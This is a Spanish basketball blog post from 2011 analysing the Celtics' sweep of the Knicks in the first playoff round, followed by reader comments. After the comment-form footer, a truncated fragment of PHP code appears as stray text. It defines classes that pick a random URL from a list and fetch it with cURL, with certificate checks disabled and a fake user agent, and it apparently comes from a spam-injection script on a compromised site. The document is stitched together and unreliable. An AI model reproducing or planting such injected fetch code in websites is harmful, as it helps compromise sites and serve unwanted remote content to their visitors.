Primera Ronda del Este: Celtics 4 – Knicks 0

25 de April de 2011 por TheDeerHunter

Se acabó el sueño. Fue bonito mientras duró, muy poco tiempo por cierto. El mítico Madison Square Garden …¿cuantos años hacía que no era escenario de una serie de playoffs? Tendríamos que tirar de google para dar la respuesta exacta. Tantos años de promesas rotas, de despropósitos acumulados. Por fin este curso parecía verse luz al final del tunel. Después llegó la opción Melo y los Knicks apostaron fuerte. No es el momento para entrar a valorar la decisión. Difícilmente hubieran podido evitar caer ahora de cualquier forma.

Melo buscando alguien a quien pasar bajo la mirada de Garnett

No cabe duda de que el despertar es muy duro. Una barrida es una barrida. No ha habido suerte y a las primeras de cambio Billups se lesiona y Stoudemire queda muy tocado. La debilidad de la plantilla queda en evidencia y Melo no es suficiente para doblegar a los actuales subcampeones, ni en sus mejores sueños. Por desgracia ni siquiera han podido ofrecer emoción a su parroquia, pues los dos mejores choques fueron en Boston. A partir de todo esto muy poco análisis se puede extraer por la parte que le toca a Nueva York. A esperar al curso que viene para ello.

Los Celtics han hecho bien su trabajo. Las circunstancias y el rival tampoco les permite despejar todas las dudas, pero sí ganan crédito y confianza a la espera de retos mayores. También algo de tiempo para recuperar por fin al “Perro grande”. Simplemente ha bastado con la versión postemporada de Ray y Pierce, muy cómodos para hacer sangre a voluntad. Garnett y Davis han estado y Jermaine ha cumplido en posiblemente la serie más cómoda que haya disfrutado en su carrera. Pero lo más importante para ellos es volver a ver a Rondo con confianza. Eficaz en el tiro y brillante en la dirección. Gran fichaje de última hora.

PREMIOS

MVP: A Paul Pierce le ha tocado bailar con la más fea. Carmelo Anthony únicamente ha logrado estar intermitente en ataque y, Pierce no tiene claro su rival en la siguiente rondaademás Pierce se las ha devuelto todas juntas en cuanto ha tenido ocasión. 22.3 puntos; 4.3 rebotes; 2.5 asistencias y 2 robos. Buenos números.

Sorpresa: Rajon Rondo parece haber atravesado el bache. Partidos de 30 puntos, otros de triple doble, casi siempre dobles dígitos en asistencias. Ese sí es uno de los mejores bases de la liga y la clave de poder ver otro anillo en Boston próximamente.

Decepción: Qué mal ha terminado el curso Landry Fields. 18 minutos de juego para ser el peor Knick de esta serie con mucha diferencia. ¿Cual es la verdadera versión, la de ahora o la de antes?

Esfuerzo en vano: Melo ha sido el mejor de los suyos en esta serie. En algún momento ha estado incluso a punto de armarla él solo. Sin embargo Stoudamire ha tenido que jugar lesionado para mantener las débiles esperanzas. Tampoco ha servido de mucho.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Tras el parón de vacaciones me uno a los playoffs de la temporada que espero tengan emociones fuertes. Vi ratos de los 2 primeros partidos en los que los Knicks aguantaron y tuvieron opciones de victoria hasta que la experiencia celtic les batió. Eso prometía emociones para el Madison pero no fue así y las lesiones de los Knicks y dos partidos muy serios de los Celtics les barrieron de la eliminatoria. Los Knicks han luchado y claramente esta no era su temporada en los playoffs. Los verdes han superado el primer escollo mucho más fácil de lo que muchos pensaban y se presentan reforzados sobre todo por estos 2 últimos partidos. Garnett está mucho mejor que el año pasado y si Shaq se recupera para ayudar a Jermaine su juego interior puede acompañar de lujo a los Rondo, Pierce y Allen que han jugado muy bien esta primera ronda. Deseando estoy de que empiecen las series con los Heat donde por fin despejaremos dudas sobre ambos equipos. ¿Cual de los dos está para el título? Solución a partir del próximo fin de semana.

      Citar

  2. OrangeBlue dice:
    #2

    que decepción los knicks… bueno, me esperaba que pasasen los celtics con un 4-2 o si me apurabaas un 4-3 cada uno ganando en su casa… espero al año que viene a ver si llega marc para reforzar la pintura y con la marcha de billups un base de garantias(se dice que podria volver felton+harrington o andersen por chauncey) y tener dos jugadores de banquillo tipo wilson chandler(que pena que se marchase) mas relleno como marquis daniels o matt bonner… la nota positiva para mi es jared jeffries, creo que ha demostrado que es un gran defensor

      Citar

  3. ichigo9999 dice:
    #3

    Los knicks han demostrado una cosa, no tiene suplentes. Jeffries es el unico qe a dado un paso a delante, los demas, tirando i tirando i metiendo poco i de milagro, billups es una leyenda, pero nose vive de leyendas, necesitamos un base joven, como Kemba Walker, MVP de la liga universitaria, io intentaria conseguirlo, ademas creo qe este año se presenta al draft. Despues, un escolta que pueda dar descanso ofensivo a Melo, landry tiene dos jugadas si las mete bien i si no bueno. Nose, un Wesley Jhonson de Minesota podria intentar bajar sus numeros i aportar juventud a la plantilla, Fields como esta jugando seria suplente en cualqier equipo.
    Carmelo es un anotador nato, no me puedo qejar de él ia qe lo a dado todo en estos play-offs, Stoudomier siempre me gusto, hizo grandes temporadas con los Suns con la ayuda de Steve Nash, ademas, creo qe la llegada de Melo le a afectado sicologicamente, porqe es verdad qe ia no tira tanto como antes i sus numeros an bajado.
    Un pivot rocoso es lo qe hace falta, un pivot como Marc, qe coja rebotes, qe defienda i sea el guardaespaldas de Stoudomier, Turiaf no es un pivot de esas caracteristicas i jeffries nose de qe juega, porqe nunca les veo atacar, o AP o A pero podria ser un nose 9º hombre i qe sea el qe juega si no esta Stoudomier es vergonzoso

    Creo qe a pesar de lo qe piensen algunos, los Knicks es un eqipo qe se esta contruyendo, porqe es qinteto titular no es de play-offs aunqe tenga grandes estrellas i los suplentes, tony douglas es joven i es anotador, con mucho esfuerzo podria ser un Kemba Walker, pero de 6º hombre no esta mal del todo, pero los demas son un grupo qe en el campo son barridos por cualqier eqipo, un eqipo suplente a de ser conservador, tener opciones en ataque i asegurar la defensa contra buenos jugadores, pero los suplentes de los knicks no cumplen nada de nada i Carmelo se tiene qe exprimir asta dejarse seco.

    Solo me qeda decir qe para el año qe viene necesitamos poner carne joven de suplentes i fichar un pivot i un base “al menos” qe tengan calidad

      Citar

  4. Javijaen dice:
    #4

    Bueno, vuelvo de Semana Santa para analizar un barrido de los Celtics: Si al débil juego en defensa de los Knicks le sumamos que su base titular se lesiona en el primer partido (solo ganado por Boston gracias a “no fallo ni un triple” Allen), que Amare se queda al 50%, y que los Celtics probablemente tengan una de las mejores defensas de la NBA, pues 4-0. Aunque para ser justos, el primer partido podía haber caido de cualquier lado, y el segundo casi casi. Eso sí, en el Madison no Spike Lee apenas pudo vibrar… Conclusiones: Celtics en modo PO siguen siendo demasiado poderosos, aunque hay ciertas dudas que habrá que resolver ante (muy probablemente) Heat. Y sobre Knicks… Fields no pudo aguantar la presión de rookie y se vino abajo. Los centers muy flojos, posiblemente Jared Jeffreis el mejor, pero hace falta músculo allí abajo. Finalmente, ni Douglas, ni Carter (aunque se marcó una buena segunda mitad este último partido), ni Walker, ni Turiaf “manos de mantequilla”, ni Brown, ni Mason, ni Sheldon Williams, ni Balkman o Rautins (¿Quién?) son nada del otro mundo y deben encontrar sustitutos, o al menos para que haya un cinco inicial más fuerte. Sobre la llegada de Marc, lo dudo porque es restringido, aunque con la renovación de Zach es posible… Pero sobre todo se puede pensar a tener un buen proyecto para 2013… y eso es mucho tiempo para D´Antoni… o no?

      Citar

  5. TheDeerHunter dice:
    #5

    como se esperaba Billups renovado por 14 kilos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>